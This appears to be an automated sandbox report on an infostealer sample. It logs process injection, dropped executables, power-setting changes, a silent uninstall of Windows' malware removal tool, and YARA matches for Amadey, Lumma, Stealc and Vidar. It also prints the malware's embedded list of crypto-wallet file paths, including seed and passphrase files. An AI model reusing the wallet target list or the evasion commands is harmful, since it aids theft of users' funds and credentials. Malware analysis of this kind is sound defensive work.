Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D38C1E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D9332C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C86A50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 2497B690000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 138E7F80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20D8E630000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A1F3D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1F9A2AB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 157C35C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 51C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 51C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 51C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 51C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 51C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 51C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 51C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 51C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 51C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 51C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEE60000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D5590A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4F20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4F20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4F20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4F20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4F20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4F20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4F20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4F20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4F20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4F20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 58F0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4780000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4780000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4780000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4780000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4780000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4780000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4780000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4780000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4780000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe base: 4780000

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHDGDGHCAAK.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsHDGDGHCAAK.exe "C:\Users\user\DocumentsHDGDGHCAAK.exe"	Jump to behavior
Source: C:\Users\user\DocumentsHDGDGHCAAK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe "C:\Users\user\AppData\Local\Temp\1005413001\test2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C7F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C7F4760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6D1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6C6D1C30

Source: DocumentsHDGDGHCAAK.exe, 00000009.00000002.2027196218.00000000008BC000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2065272457.00000000009EC000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000000B.00000002.2077786429.00000000009EC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 0000002C.00000000.2529657462.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002C.00000002.2945655636.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000037.00000002.2966921416.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: file.exe, file.exe, 00000000.00000002.1997434741.00000000005A2000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: LProgram Manager
Source: winlogon.exe, 0000002C.00000000.2529657462.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002C.00000002.2945655636.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000037.00000002.2966921416.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 0000002C.00000000.2529657462.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002C.00000002.2945655636.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000037.00000002.2966921416.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: winlogon.exe, 0000002C.00000000.2529657462.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002C.00000002.2945655636.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000037.00000002.2966921416.000002BAA8050000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C7AAE71 cpuid

0_2_6C7AAE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005414001\96b31e1a32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005415001\8490cd1d50.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005417001\c511421282.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005417001\c511421282.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C7AA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6C7AA8DC

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 12_2_007B65E0 LookupAccountNameA,

12_2_007B65E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6F8390 NSS_GetVersion,

0_2_6C6F8390

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005413001\test2.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior

Source: svchost.exe, 0000003E.00000000.2590232619.000001D559B8F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000003E.00000003.2801124600.000001D559B90000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 10.2.skotes.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.DocumentsHDGDGHCAAK.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.skotes.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.skotes.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2928876012.00000000007B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2074643854.00000000007B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2014400254.0000000000681000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2064829735.00000000007B1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1998156221.00000000015DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1677868840.0000000005270000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1997064501.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.1997064501.0000000000254000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 